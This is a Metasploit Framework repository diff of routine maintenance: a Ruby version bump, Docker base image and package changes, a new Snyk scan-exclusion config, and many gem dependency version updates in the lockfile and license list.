 Tab Assassin <tabassassin@metasploit.com> TabAssassin <tabasssassin@metasploit.com>
 Tab Assassin <tabassassin@metasploit.com> Tabassassin <tabassassin@metasploit.com>
 Tab Assassin <tabassassin@metasploit.com> Tabasssassin <tabassassin@metasploit.com>
-Tab Assassin <tabassassin@metasploit.com> URI Assassin <tabassassin@metasploit.com>
+Tab Assassin <tabassassin@metasploit.com> URI Assassin <tabassassin@metasploit.com>
@@ -1 +1 @@
-3.1.5
+3.2.5
@@ -0,0 +1,9 @@
+version: v1.25.0
+ignore: {}
+patch: {}
+exclude:
+  global:
+    # exclude unit tests which contain hard coded passwords and encrypting keys for testing purposes.
+    - spec/
+    # exclude the source code to local exploits and utilities which have to be written in a particular way to exploit the vulnerabilities that we're targeting.
+    - external/source/
@@ -1,4 +1,4 @@
-FROM ruby:3.1.5-alpine3.18 AS builder
+FROM ruby:3.2.5-alpine3.20 AS builder
 LABEL maintainer="Rapid7"

 ARG BUNDLER_CONFIG_ARGS="set no-cache 'true' set system 'true' set without 'development test coverage'"
@@ -53,7 +53,7 @@ RUN mkdir -p $TOOLS_HOME/bin && \
    cd go/src && \
    ./make.bash

-FROM ruby:3.1.5-alpine3.18
+FROM ruby:3.2.5-alpine3.20
 LABEL maintainer="Rapid7"
 ARG TARGETARCH

@@ -65,8 +65,8 @@ ENV METASPLOIT_GROUP=metasploit
 # used for the copy command
 RUN addgroup -S $METASPLOIT_GROUP

-RUN apk add --no-cache bash sqlite-libs nmap nmap-scripts nmap-nselibs \
-    postgresql-libs python3 py3-pip ncurses libcap su-exec alpine-sdk \
+RUN apk add --no-cache curl bash sqlite-libs nmap nmap-scripts nmap-nselibs \
+    postgresql-libs python3 py3-pip py3-impacket py3-requests ncurses libcap su-exec alpine-sdk \
    openssl-dev nasm
 RUN\
    if [ "${TARGETARCH}" = "arm64" ];\
@@ -74,7 +74,6 @@ RUN\
    else apk add --no-cache mingw-w64-gcc;\
    fi

-
 RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which ruby)
 RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which nmap)

@@ -86,9 +85,6 @@ RUN chown -R root:metasploit $APP_HOME/
 RUN chmod 664 $APP_HOME/Gemfile.lock
 RUN gem update --system
 RUN cp -f $APP_HOME/docker/database.yml $APP_HOME/config/database.yml
-RUN curl -L -O https://raw.githubusercontent.com/pypa/get-pip/f84b65709d4b20221b7dbee900dbf9985a81b5d4/public/get-pip.py && python3 get-pip.py && rm get-pip.py
-RUN pip install impacket
-RUN pip install requests

 ENV GOPATH=$TOOLS_HOME/go
 ENV GOROOT=$TOOLS_HOME/bin/go
@@ -1,7 +1,7 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (6.4.26)
+    metasploit-framework (6.4.52)
      aarch64
      abbrev
      actionpack (~> 7.0.0)
@@ -15,14 +15,17 @@ PATH
      base64
      bcrypt
      bcrypt_pbkdf
+      benchmark
      bigdecimal
      bootsnap
      bson
      chunky_png
+      concurrent-ruby (= 1.3.4)
      csv
      dnsruby
      drb
      ed25519
+      elftools
      em-http-request
      eventmachine
      faker
@@ -30,6 +33,7 @@ PATH
      faraday-retry
      faye-websocket
      ffi (< 1.17.0)
+      fiddle
      filesize
      getoptlong
      hrr_rb_ssh-ed25519
@@ -41,9 +45,9 @@ PATH
      metasploit-concern
      metasploit-credential
      metasploit-model
-      metasploit-payloads (= 2.0.166)
+      metasploit-payloads (= 2.0.189)
      metasploit_data_models
-      metasploit_payloads-mettle (= 1.0.31)
+      metasploit_payloads-mettle (= 1.0.35)
      mqtt
      msgpack (~> 1.6.0)
      mutex_m
@@ -59,6 +63,7 @@ PATH
      octokit (~> 4.0)
      openssl-ccm
      openvas-omp
+      ostruct
      packetfu
      patch_finder
      pcaprub
@@ -66,7 +71,7 @@ PATH
      pg
      puma
      railties
-      rasn1
+      rasn1 (= 0.13.0)
      rb-readline
      recog
      redcarpet
@@ -117,31 +122,31 @@ GEM
    aarch64 (2.1.0)
      racc (~> 1.6)
    abbrev (0.1.2)
-    actionpack (7.0.8.4)
-      actionview (= 7.0.8.4)
-      activesupport (= 7.0.8.4)
+    actionpack (7.0.8.6)
+      actionview (= 7.0.8.6)
+      activesupport (= 7.0.8.6)
      rack (~> 2.0, >= 2.2.4)
      rack-test (>= 0.6.3)
      rails-dom-testing (~> 2.0)
      rails-html-sanitizer (~> 1.0, >= 1.2.0)
-    actionview (7.0.8.4)
-      activesupport (= 7.0.8.4)
+    actionview (7.0.8.6)
+      activesupport (= 7.0.8.6)
      builder (~> 3.1)
      erubi (~> 1.4)
      rails-dom-testing (~> 2.0)
      rails-html-sanitizer (~> 1.1, >= 1.2.0)
-    activemodel (7.0.8.4)
-      activesupport (= 7.0.8.4)
-    activerecord (7.0.8.4)
-      activemodel (= 7.0.8.4)
-      activesupport (= 7.0.8.4)
-    activesupport (7.0.8.4)
+    activemodel (7.0.8.6)
+      activesupport (= 7.0.8.6)
+    activerecord (7.0.8.6)
+      activemodel (= 7.0.8.6)
+      activesupport (= 7.0.8.6)
+    activesupport (7.0.8.6)
      concurrent-ruby (~> 1.0, >= 1.0.2)
      i18n (>= 1.6, < 2)
      minitest (>= 5.1)
      tzinfo (~> 2.0)
-    addressable (2.8.6)
-      public_suffix (>= 2.0.2, < 6.0)
+    addressable (2.8.7)
+      public_suffix (>= 2.0.2, < 7.0)
    afm (0.2.2)
    allure-rspec (2.24.5)
      allure-ruby-commons (= 2.24.5)
@@ -151,45 +156,46 @@ GEM
      require_all (>= 2, < 4)
      rspec-expectations (~> 3.12)
      uuid (>= 2.3, < 3)
-    arel-helpers (2.14.0)
+    arel-helpers (2.15.0)
      activerecord (>= 3.1.0, < 8)
    ast (2.4.2)
    aws-eventstream (1.3.0)
-    aws-partitions (1.941.0)
-    aws-sdk-core (3.197.0)
+    aws-partitions (1.999.0)
+    aws-sdk-core (3.211.0)
      aws-eventstream (~> 1, >= 1.3.0)
-      aws-partitions (~> 1, >= 1.651.0)
-      aws-sigv4 (~> 1.8)
+      aws-partitions (~> 1, >= 1.992.0)
+      aws-sigv4 (~> 1.9)
      jmespath (~> 1, >= 1.6.1)
-    aws-sdk-ec2 (1.460.0)
-      aws-sdk-core (~> 3, >= 3.197.0)
-      aws-sigv4 (~> 1.1)
-    aws-sdk-ec2instanceconnect (1.41.0)
-      aws-sdk-core (~> 3, >= 3.197.0)
-      aws-sigv4 (~> 1.1)
-    aws-sdk-iam (1.99.0)
-      aws-sdk-core (~> 3, >= 3.197.0)
-      aws-sigv4 (~> 1.1)
-    aws-sdk-kms (1.83.0)
-      aws-sdk-core (~> 3, >= 3.197.0)
-      aws-sigv4 (~> 1.1)
-    aws-sdk-s3 (1.152.0)
-      aws-sdk-core (~> 3, >= 3.197.0)
+    aws-sdk-ec2 (1.486.0)
+      aws-sdk-core (~> 3, >= 3.210.0)
+      aws-sigv4 (~> 1.5)
+    aws-sdk-ec2instanceconnect (1.52.0)
+      aws-sdk-core (~> 3, >= 3.210.0)
+      aws-sigv4 (~> 1.5)
+    aws-sdk-iam (1.112.0)
+      aws-sdk-core (~> 3, >= 3.210.0)
+      aws-sigv4 (~> 1.5)
+    aws-sdk-kms (1.95.0)
+      aws-sdk-core (~> 3, >= 3.210.0)
+      aws-sigv4 (~> 1.5)
+    aws-sdk-s3 (1.169.0)
+      aws-sdk-core (~> 3, >= 3.210.0)
      aws-sdk-kms (~> 1)
-      aws-sigv4 (~> 1.8)
-    aws-sdk-ssm (1.170.0)
-      aws-sdk-core (~> 3, >= 3.197.0)
-      aws-sigv4 (~> 1.1)
-    aws-sigv4 (1.8.0)
+      aws-sigv4 (~> 1.5)
+    aws-sdk-ssm (1.183.0)
+      aws-sdk-core (~> 3, >= 3.210.0)
+      aws-sigv4 (~> 1.5)
+    aws-sigv4 (1.10.1)
      aws-eventstream (~> 1, >= 1.0.2)
    base64 (0.2.0)
    bcrypt (3.1.20)
    bcrypt_pbkdf (1.1.1)
+    benchmark (0.4.0)
    bigdecimal (3.1.8)
    bindata (2.4.15)
-    bootsnap (1.18.3)
+    bootsnap (1.18.4)
      msgpack (~> 1.2)
-    bson (5.0.0)
+    bson (5.0.1)
    builder (3.3.0)
    byebug (11.1.3)
    chunky_png (1.4.0)
@@ -199,33 +205,36 @@ GEM
    crass (1.0.6)
    csv (3.3.0)
    daemons (1.4.1)
-    date (3.3.4)
+    date (3.4.1)
    debug (1.8.0)
      irb (>= 1.5.0)
      reline (>= 0.3.1)
    diff-lcs (1.5.1)
-    dnsruby (1.72.1)
+    dnsruby (1.72.2)
      simpleidn (~> 0.2.1)
-    docile (1.4.0)
+    docile (1.4.1)
    domain_name (0.6.20240107)
    drb (2.2.1)
    ed25519 (1.3.0)
+    elftools (1.3.1)
+      bindata (~> 2)
    em-http-request (1.1.7)
      addressable (>= 2.3.4)
      cookiejar (!= 0.3.1)
      em-socksify (>= 0.3)
      eventmachine (>= 1.0.3)
      http_parser.rb (>= 0.6.0)
-    em-socksify (0.3.2)
+    em-socksify (0.3.3)
+      base64
      eventmachine (>= 1.0.0.beta.4)
    erubi (1.13.0)
    eventmachine (1.2.7)
-    factory_bot (6.4.6)
+    factory_bot (6.5.0)
      activesupport (>= 5.0.0)
-    factory_bot_rails (6.4.3)
-      factory_bot (~> 6.4)
+    factory_bot_rails (6.4.4)
+      factory_bot (~> 6.5)
      railties (>= 5.0.0)
-    faker (3.4.1)
+    faker (3.5.1)
      i18n (>= 1.8.11, < 2)
    faraday (2.7.11)
      base64
@@ -238,6 +247,7 @@ GEM
      eventmachine (>= 0.12.0)
      websocket-driver (>= 0.5.1)
    ffi (1.16.3)
+    fiddle (1.1.6)
    filesize (0.2.0)
    fivemat (1.3.7)
    getoptlong (0.2.1)
@@ -251,11 +261,11 @@ GEM
    hrr_rb_ssh-ed25519 (0.4.2)
      ed25519 (~> 1.2)
      hrr_rb_ssh (>= 0.4)
-    http-cookie (1.0.6)
+    http-cookie (1.0.7)
      domain_name (~> 0.5)
    http_parser.rb (0.8.0)
    httpclient (2.8.3)
-    i18n (1.14.5)
+    i18n (1.14.6)
      concurrent-ruby (~> 1.0)
    io-console (0.7.2)
    irb (1.7.4)
@@ -263,25 +273,26 @@ GEM
    jmespath (1.6.2)
    jsobfu (0.4.2)
      rkelly-remix
-    json (2.7.2)
+    json (2.7.5)
    language_server-protocol (3.17.0.3)
    little-plugger (1.1.4)
+    logger (1.6.1)
    logging (2.4.0)
      little-plugger (~> 1.1)
      multi_json (~> 1.14)
-    loofah (2.22.0)
+    loofah (2.23.1)
      crass (~> 1.0.2)
      nokogiri (>= 1.12.0)
    macaddr (1.7.2)
      systemu (~> 2.6.5)
-    memory_profiler (1.0.1)
+    memory_profiler (1.1.0)
    metasm (1.0.5)
-    metasploit-concern (5.0.2)
+    metasploit-concern (5.0.3)
      activemodel (~> 7.0)
      activesupport (~> 7.0)
      railties (~> 7.0)
      zeitwerk
-    metasploit-credential (6.0.9)
+    metasploit-credential (6.0.11)
      metasploit-concern
      metasploit-model
      metasploit_data_models (>= 5.0.0)
@@ -295,8 +306,8 @@ GEM
      activemodel (~> 7.0)
      activesupport (~> 7.0)
      railties (~> 7.0)
-    metasploit-payloads (2.0.166)
-    metasploit_data_models (6.0.3)
+    metasploit-payloads (2.0.189)
+    metasploit_data_models (6.0.6)
      activerecord (~> 7.0)
      activesupport (~> 7.0)
      arel-helpers
@@ -306,21 +317,22 @@ GEM
      railties (~> 7.0)
      recog
      webrick
-    metasploit_payloads-mettle (1.0.31)
+    metasploit_payloads-mettle (1.0.35)
    method_source (1.1.0)
-    mime-types (3.5.2)
+    mime-types (3.6.0)
+      logger
      mime-types-data (~> 3.2015)
-    mime-types-data (3.2024.0604)
-    mini_portile2 (2.8.7)
+    mime-types-data (3.2024.1001)
+    mini_portile2 (2.8.8)
    minitest (5.25.1)
    mqtt (0.6.0)
    msgpack (1.6.1)
    multi_json (1.15.0)
-    mustermann (3.0.0)
+    mustermann (3.0.3)
      ruby2_keywords (~> 0.0.1)
    mutex_m (0.2.0)
    nessus_rest (0.1.6)
-    net-imap (0.4.12)
+    net-imap (0.5.0)
      date
      net-protocol
    net-ldap (0.19.0)
@@ -330,14 +342,14 @@ GEM
      net-ssh (>= 5.0.0, < 8.0.0)
    net-smtp (0.5.0)
      net-protocol
-    net-ssh (7.2.3)
+    net-ssh (7.3.0)
    network_interface (0.0.4)
    nexpose (7.3.0)
-    nio4r (2.7.3)
-    nokogiri (1.16.7)
+    nio4r (2.7.4)
+    nokogiri (1.18.2)
      mini_portile2 (~> 2.8.2)
      racc (~> 1.4)
-    nori (2.7.0)
+    nori (2.7.1)
      bigdecimal
    octokit (4.25.1)
      faraday (>= 1, < 3)
@@ -345,10 +357,11 @@ GEM
    openssl-ccm (1.2.3)
    openssl-cmac (2.0.2)
    openvas-omp (0.0.4)
+    ostruct (0.6.1)
    packetfu (2.0.0)
      pcaprub (~> 0.13.1)
-    parallel (1.24.0)
-    parser (3.3.2.0)
+    parallel (1.26.3)
+    parser (3.3.5.0)
      ast (~> 2.4.1)
      racc
    patch_finder (1.0.2)
@@ -359,18 +372,18 @@ GEM
      hashery (~> 2.0)
      ruby-rc4
      ttfunk
-    pg (1.5.6)
+    pg (1.5.9)
    pry (0.14.2)
      coderay (~> 1.1)
      method_source (~> 1.0)
    pry-byebug (3.10.1)
      byebug (~> 11.0)
      pry (>= 0.13, < 0.15)
-    public_suffix (5.0.5)
-    puma (6.4.2)
+    public_suffix (6.0.1)
+    puma (6.4.3)
      nio4r (~> 2.0)
    racc (1.8.1)
-    rack (2.2.9)
+    rack (2.2.10)
    rack-protection (3.2.0)
      base64 (>= 0.1.0)
      rack (~> 2.2, >= 2.2.4)
@@ -383,9 +396,9 @@ GEM
    rails-html-sanitizer (1.6.0)
      loofah (~> 2.21)
      nokogiri (~> 1.14)
-    railties (7.0.8.4)
-      actionpack (= 7.0.8.4)
-      activesupport (= 7.0.8.4)
+    railties (7.0.8.6)
+      actionpack (= 7.0.8.6)
+      activesupport (= 7.0.8.6)
      method_source
      rake (>= 12.2)
      thor (~> 1.0)
@@ -395,14 +408,14 @@ GEM
    rasn1 (0.13.0)
      strptime (~> 0.2.5)
    rb-readline (0.5.5)
-    recog (3.1.5)
+    recog (3.1.11)
      nokogiri
    redcarpet (3.6.0)
    regexp_parser (2.9.2)
-    reline (0.5.8)
+    reline (0.5.10)
      io-console (~> 0.5)
    require_all (3.0.0)
-    rex-arch (0.1.15)
+    rex-arch (0.1.16)
      rex-text
    rex-bin_tools (0.1.9)
      metasm
@@ -415,7 +428,7 @@ GEM
      metasm
      rex-arch
      rex-text
-    rex-exploitation (0.1.39)
+    rex-exploitation (0.1.40)
      jsobfu
      metasm
      rex-arch
@@ -429,46 +442,46 @@ GEM
      rex-arch
    rex-ole (0.1.8)
      rex-text
-    rex-powershell (0.1.99)
+    rex-powershell (0.1.100)
      rex-random_identifier
      rex-text
      ruby-rc4
-    rex-random_identifier (0.1.12)
+    rex-random_identifier (0.1.13)
      rex-text
    rex-registry (0.1.5)
    rex-rop_builder (0.1.5)
      metasm
      rex-core
      rex-text
-    rex-socket (0.1.57)
+    rex-socket (0.1.58)
+      dnsruby
      rex-core
    rex-sslscan (0.1.10)
      rex-core
      rex-socket
      rex-text
    rex-struct2 (0.1.4)
-    rex-text (0.2.58)
+    rex-text (0.2.59)
    rex-zip (0.1.5)
      rex-text
-    rexml (3.3.6)
-      strscan
+    rexml (3.3.9)
    rkelly-remix (0.0.7)
    rspec (3.13.0)
      rspec-core (~> 3.13.0)
      rspec-expectations (~> 3.13.0)
      rspec-mocks (~> 3.13.0)
-    rspec-core (3.13.0)
+    rspec-core (3.13.2)
      rspec-support (~> 3.13.0)
-    rspec-expectations (3.13.2)
+    rspec-expectations (3.13.3)
      diff-lcs (>= 1.2.0, < 2.0)
      rspec-support (~> 3.13.0)
-    rspec-mocks (3.13.1)
+    rspec-mocks (3.13.2)
      diff-lcs (>= 1.2.0, < 2.0)
      rspec-support (~> 3.13.0)
-    rspec-rails (6.1.4)
-      actionpack (>= 6.1)
-      activesupport (>= 6.1)
-      railties (>= 6.1)
+    rspec-rails (7.0.1)
+      actionpack (>= 7.0)
+      activesupport (>= 7.0)
+      railties (>= 7.0)
      rspec-core (~> 3.13)
      rspec-expectations (~> 3.13)
      rspec-mocks (~> 3.13)
@@ -476,32 +489,31 @@ GEM
    rspec-rerun (1.1.0)
      rspec (~> 3.0)
    rspec-support (3.13.1)
-    rubocop (1.64.1)
+    rubocop (1.67.0)
      json (~> 2.3)
      language_server-protocol (>= 3.17.0)
      parallel (~> 1.10)
      parser (>= 3.3.0.2)
      rainbow (>= 2.2.2, < 4.0)
-      regexp_parser (>= 1.8, < 3.0)
-      rexml (>= 3.2.5, < 4.0)
-      rubocop-ast (>= 1.31.1, < 2.0)
+      regexp_parser (>= 2.4, < 3.0)
+      rubocop-ast (>= 1.32.2, < 2.0)
      ruby-progressbar (~> 1.7)
      unicode-display_width (>= 2.4.0, < 3.0)
-    rubocop-ast (1.31.3)
+    rubocop-ast (1.33.0)
      parser (>= 3.3.1.0)
-    ruby-macho (4.0.1)
+    ruby-macho (4.1.0)
    ruby-mysql (4.1.0)
    ruby-prof (1.4.2)
    ruby-progressbar (1.13.0)
    ruby-rc4 (0.1.5)
    ruby2_keywords (0.0.5)
-    ruby_smb (3.3.9)
+    ruby_smb (3.3.13)
      bindata (= 2.4.15)
      openssl-ccm
      openssl-cmac
-      rubyntlm
+      rubyntlm (>= 0.6.5)
      windows_error (>= 0.1.4)
-    rubyntlm (0.6.4)
+    rubyntlm (0.6.5)
      base64
    rubyzip (2.3.2)
    sawyer (0.9.2)
@@ -510,7 +522,7 @@ GEM
    simplecov (0.18.2)
      docile (~> 1.1)
      simplecov-html (~> 0.11)
-    simplecov-html (0.12.3)
+    simplecov-html (0.13.1)
    simpleidn (0.2.3)
    sinatra (3.2.0)
      mustermann (~> 3.0)
@@ -521,52 +533,52 @@ GEM
      mini_portile2 (~> 2.8.0)
    sshkey (3.0.0)
    strptime (0.2.5)
-    strscan (3.1.0)
    swagger-blocks (3.0.0)
    systemu (2.6.5)
-    test-prof (1.3.3)
+    test-prof (1.4.2)
    thin (1.8.2)
      daemons (~> 1.0, >= 1.0.9)
      eventmachine (~> 1.0, >= 1.0.4)
      rack (>= 1, < 3)
-    thor (1.3.1)
-    tilt (2.3.0)
-    timecop (0.9.9)
+    thor (1.3.2)
+    tilt (2.4.0)
+    timecop (0.9.10)
    timeout (0.4.1)
    ttfunk (1.8.0)
      bigdecimal (~> 3.1)
    tzinfo (2.0.6)
      concurrent-ruby (~> 1.0)
-    tzinfo-data (1.2024.1)
+    tzinfo-data (1.2024.2)
      tzinfo (>= 1.0.0)
-    unicode-display_width (2.5.0)
+    unicode-display_width (2.6.0)
    unix-crypt (1.3.1)
    uuid (2.3.9)
      macaddr (~> 1.0)
    warden (1.2.9)
      rack (>= 2.0.9)
-    webrick (1.8.1)
+    webrick (1.8.2)
    websocket-driver (0.7.6)
      websocket-extensions (>= 0.1.0)
    websocket-extensions (0.1.5)
    win32api (0.1.0)
    windows_error (0.1.5)
-    winrm (2.3.6)
+    winrm (2.3.9)
      builder (>= 2.1.2)
      erubi (~> 1.8)
      gssapi (~> 1.2)
      gyoku (~> 1.0)
      httpclient (~> 2.2, >= 2.2.0.2)
      logging (>= 1.6.1, < 3.0)
-      nori (~> 2.0)
+      nori (~> 2.0, >= 2.7.1)
+      rexml (~> 3.0)
      rubyntlm (~> 0.6.0, >= 0.6.3)
    xdr (3.0.3)
      activemodel (>= 4.2, < 8.0)
      activesupport (>= 4.2, < 8.0)
    xmlrpc (0.3.3)
      webrick
-    yard (0.9.36)
-    zeitwerk (2.6.17)
+    yard (0.9.37)
+    zeitwerk (2.6.18)

 PLATFORMS
  ruby
@@ -592,4 +604,4 @@ DEPENDENCIES
  yard

 BUNDLED WITH
-   2.1.4
+   2.5.10
@@ -2,36 +2,37 @@ This file is auto-generated by tools/dev/update_gem_licenses.sh
 Ascii85, 1.1.1, MIT
 aarch64, 2.1.0, "Apache 2.0"
 abbrev, 0.1.2, "ruby, Simplified BSD"
-actionpack, 7.0.8.4, MIT
-actionview, 7.0.8.4, MIT
-activemodel, 7.0.8.4, MIT
-activerecord, 7.0.8.4, MIT
-activesupport, 7.0.8.4, MIT
-addressable, 2.8.6, "Apache 2.0"
+actionpack, 7.0.8.6, MIT
+actionview, 7.0.8.6, MIT
+activemodel, 7.0.8.6, MIT
+activerecord, 7.0.8.6, MIT
+activesupport, 7.0.8.6, MIT
+addressable, 2.8.7, "Apache 2.0"
 afm, 0.2.2, MIT
 allure-rspec, 2.24.5, "Apache 2.0"
 allure-ruby-commons, 2.24.5, "Apache 2.0"
-arel-helpers, 2.14.0, MIT
+arel-helpers, 2.15.0, MIT
 ast, 2.4.2, MIT
 aws-eventstream, 1.3.0, "Apache 2.0"
-aws-partitions, 1.941.0, "Apache 2.0"
-aws-sdk-core, 3.197.0, "Apache 2.0"
-aws-sdk-ec2, 1.460.0, "Apache 2.0"
-aws-sdk-ec2instanceconnect, 1.41.0, "Apache 2.0"
-aws-sdk-iam, 1.99.0, "Apache 2.0"
-aws-sdk-kms, 1.83.0, "Apache 2.0"
-aws-sdk-s3, 1.152.0, "Apache 2.0"
-aws-sdk-ssm, 1.170.0, "Apache 2.0"
-aws-sigv4, 1.8.0, "Apache 2.0"
+aws-partitions, 1.999.0, "Apache 2.0"
+aws-sdk-core, 3.211.0, "Apache 2.0"
+aws-sdk-ec2, 1.486.0, "Apache 2.0"
+aws-sdk-ec2instanceconnect, 1.52.0, "Apache 2.0"
+aws-sdk-iam, 1.112.0, "Apache 2.0"
+aws-sdk-kms, 1.95.0, "Apache 2.0"
+aws-sdk-s3, 1.169.0, "Apache 2.0"
+aws-sdk-ssm, 1.183.0, "Apache 2.0"
+aws-sigv4, 1.10.1, "Apache 2.0"
 base64, 0.2.0, "ruby, Simplified BSD"
 bcrypt, 3.1.20, MIT
 bcrypt_pbkdf, 1.1.1, MIT
+benchmark, 0.4.0, "ruby, Simplified BSD"
 bigdecimal, 3.1.8, "ruby, Simplified BSD"
 bindata, 2.4.15, "Simplified BSD"
-bootsnap, 1.18.3, MIT
-bson, 5.0.0, "Apache 2.0"
+bootsnap, 1.18.4, MIT
+bson, 5.0.1, "Apache 2.0"
 builder, 3.3.0, MIT
-bundler, 2.2.3, MIT
+bundler, 2.5.10, MIT
 byebug, 11.1.3, "Simplified BSD"
 chunky_png, 1.4.0, MIT
 coderay, 1.1.3, MIT
@@ -40,26 +41,28 @@ cookiejar, 0.3.4, "Simplified BSD"
 crass, 1.0.6, MIT
 csv, 3.3.0, "ruby, Simplified BSD"
 daemons, 1.4.1, MIT
-date, 3.3.4, "ruby, Simplified BSD"
+date, 3.4.1, "ruby, Simplified BSD"
 debug, 1.8.0, "ruby, Simplified BSD"
 diff-lcs, 1.5.1, "MIT, Artistic-2.0, GPL-2.0-or-later"
-dnsruby, 1.72.1, "Apache 2.0"
-docile, 1.4.0, MIT
+dnsruby, 1.72.2, "Apache 2.0"
+docile, 1.4.1, MIT
 domain_name, 0.6.20240107, "Simplified BSD, New BSD, Mozilla Public License 2.0"
 drb, 2.2.1, "ruby, Simplified BSD"
 ed25519, 1.3.0, MIT
+elftools, 1.3.1, MIT
 em-http-request, 1.1.7, MIT
-em-socksify, 0.3.2, MIT
+em-socksify, 0.3.3, MIT
 erubi, 1.13.0, MIT
 eventmachine, 1.2.7, "ruby, GPL-2.0"
-factory_bot, 6.4.6, MIT
-factory_bot_rails, 6.4.3, MIT
-faker, 3.4.1, MIT
+factory_bot, 6.5.0, MIT
+factory_bot_rails, 6.4.4, MIT
+faker, 3.5.1, MIT
 faraday, 2.7.11, MIT
 faraday-net_http, 3.0.2, MIT
 faraday-retry, 2.2.1, MIT
 faye-websocket, 0.11.3, "Apache 2.0"
 ffi, 1.16.3, "New BSD"
+fiddle, 1.1.6, "ruby, Simplified BSD"
 filesize, 0.2.0, MIT
 fivemat, 1.3.7, MIT
 getoptlong, 0.2.1, "ruby, Simplified BSD"
@@ -68,151 +71,152 @@ gyoku, 1.4.0, MIT
 hashery, 2.1.2, "Simplified BSD"
 hrr_rb_ssh, 0.4.2, "Apache 2.0"
 hrr_rb_ssh-ed25519, 0.4.2, "Apache 2.0"
-http-cookie, 1.0.6, MIT
+http-cookie, 1.0.7, MIT
 http_parser.rb, 0.8.0, MIT
 httpclient, 2.8.3, ruby
-i18n, 1.14.5, MIT
+i18n, 1.14.6, MIT
 io-console, 0.7.2, "ruby, Simplified BSD"
 irb, 1.7.4, "ruby, Simplified BSD"
 jmespath, 1.6.2, "Apache 2.0"
 jsobfu, 0.4.2, "New BSD"
-json, 2.7.2, ruby
+json, 2.7.5, ruby
 language_server-protocol, 3.17.0.3, MIT
 little-plugger, 1.1.4, MIT
+logger, 1.6.1, "ruby, Simplified BSD"
 logging, 2.4.0, MIT
-loofah, 2.22.0, MIT
+loofah, 2.23.1, MIT
 macaddr, 1.7.2, ruby
-memory_profiler, 1.0.1, MIT
+memory_profiler, 1.1.0, MIT
 metasm, 1.0.5, LGPL-2.1
-metasploit-concern, 5.0.2, "New BSD"
-metasploit-credential, 6.0.9, "New BSD"
-metasploit-framework, 6.4.26, "New BSD"
+metasploit-concern, 5.0.3, "New BSD"
+metasploit-credential, 6.0.11, "New BSD"
+metasploit-framework, 6.4.52, "New BSD"
 metasploit-model, 5.0.2, "New BSD"
-metasploit-payloads, 2.0.166, "3-clause (or ""modified"") BSD"
-metasploit_data_models, 6.0.3, "New BSD"
-metasploit_payloads-mettle, 1.0.31, "3-clause (or ""modified"") BSD"
+metasploit-payloads, 2.0.189, "3-clause (or ""modified"") BSD"
+metasploit_data_models, 6.0.6, "New BSD"
+metasploit_payloads-mettle, 1.0.35, "3-clause (or ""modified"") BSD"
 method_source, 1.1.0, MIT
-mime-types, 3.5.2, MIT
-mime-types-data, 3.2024.0604, MIT
-mini_portile2, 2.8.7, MIT
+mime-types, 3.6.0, MIT
+mime-types-data, 3.2024.1001, MIT
+mini_portile2, 2.8.8, MIT
 minitest, 5.25.1, MIT
 mqtt, 0.6.0, MIT
 msgpack, 1.6.1, "Apache 2.0"
 multi_json, 1.15.0, MIT
-mustermann, 3.0.0, MIT
+mustermann, 3.0.3, MIT
 mutex_m, 0.2.0, "ruby, Simplified BSD"
 nessus_rest, 0.1.6, MIT
-net-imap, 0.4.12, "ruby, Simplified BSD"
+net-imap, 0.5.0, "ruby, Simplified BSD"
 net-ldap, 0.19.0, MIT
 net-protocol, 0.2.2, "ruby, Simplified BSD"
 net-sftp, 4.0.0, MIT
 net-smtp, 0.5.0, "ruby, Simplified BSD"
-net-ssh, 7.2.3, MIT
+net-ssh, 7.3.0, MIT
 network_interface, 0.0.4, MIT
 nexpose, 7.3.0, "New BSD"
-nio4r, 2.7.3, "MIT, Simplified BSD"
-nokogiri, 1.16.7, MIT
-nori, 2.7.0, MIT
+nio4r, 2.7.4, "MIT, Simplified BSD"
+nokogiri, 1.18.2, MIT
+nori, 2.7.1, MIT
 octokit, 4.25.1, MIT
 openssl-ccm, 1.2.3, MIT
 openssl-cmac, 2.0.2, MIT
 openvas-omp, 0.0.4, MIT
+ostruct, 0.6.1, "ruby, Simplified BSD"
 packetfu, 2.0.0, "New BSD"
-parallel, 1.24.0, MIT
-parser, 3.3.2.0, MIT
+parallel, 1.26.3, MIT
+parser, 3.3.5.0, MIT
 patch_finder, 1.0.2, "New BSD"
 pcaprub, 0.13.3, LGPL-2.1
 pdf-reader, 2.12.0, MIT
-pg, 1.5.6, "Simplified BSD"
+pg, 1.5.9, "Simplified BSD"
 pry, 0.14.2, MIT
 pry-byebug, 3.10.1, MIT
-public_suffix, 5.0.5, MIT
-puma, 6.4.2, "New BSD"
+public_suffix, 6.0.1, MIT
+puma, 6.4.3, "New BSD"
 racc, 1.8.1, "ruby, Simplified BSD"
-rack, 2.2.9, MIT
+rack, 2.2.10, MIT
 rack-protection, 3.2.0, MIT
 rack-test, 2.1.0, MIT
 rails-dom-testing, 2.2.0, MIT
 rails-html-sanitizer, 1.6.0, MIT
-railties, 7.0.8.4, MIT
+railties, 7.0.8.6, MIT
 rainbow, 3.1.1, MIT
 rake, 13.2.1, MIT
 rasn1, 0.13.0, MIT
 rb-readline, 0.5.5, BSD
-recog, 3.1.5, unknown
+recog, 3.1.11, unknown
 redcarpet, 3.6.0, MIT
 regexp_parser, 2.9.2, MIT
-reline, 0.5.8, ruby
+reline, 0.5.10, ruby
 require_all, 3.0.0, MIT
-rex-arch, 0.1.15, "New BSD"
+rex-arch, 0.1.16, "New BSD"
 rex-bin_tools, 0.1.9, "New BSD"
 rex-core, 0.1.32, "New BSD"
 rex-encoder, 0.1.7, "New BSD"
-rex-exploitation, 0.1.39, "New BSD"
+rex-exploitation, 0.1.40, "New BSD"
 rex-java, 0.1.7, "New BSD"
 rex-mime, 0.1.8, "New BSD"
 rex-nop, 0.1.3, "New BSD"
 rex-ole, 0.1.8, "New BSD"
-rex-powershell, 0.1.99, "New BSD"
-rex-random_identifier, 0.1.12, "New BSD"
+rex-powershell, 0.1.100, "New BSD"
+rex-random_identifier, 0.1.13, "New BSD"
 rex-registry, 0.1.5, "New BSD"
 rex-rop_builder, 0.1.5, "New BSD"
-rex-socket, 0.1.57, "New BSD"
+rex-socket, 0.1.58, "New BSD"
 rex-sslscan, 0.1.10, "New BSD"
 rex-struct2, 0.1.4, "New BSD"
-rex-text, 0.2.58, "New BSD"
+rex-text, 0.2.59, "New BSD"
 rex-zip, 0.1.5, "New BSD"
-rexml, 3.3.6, "Simplified BSD"
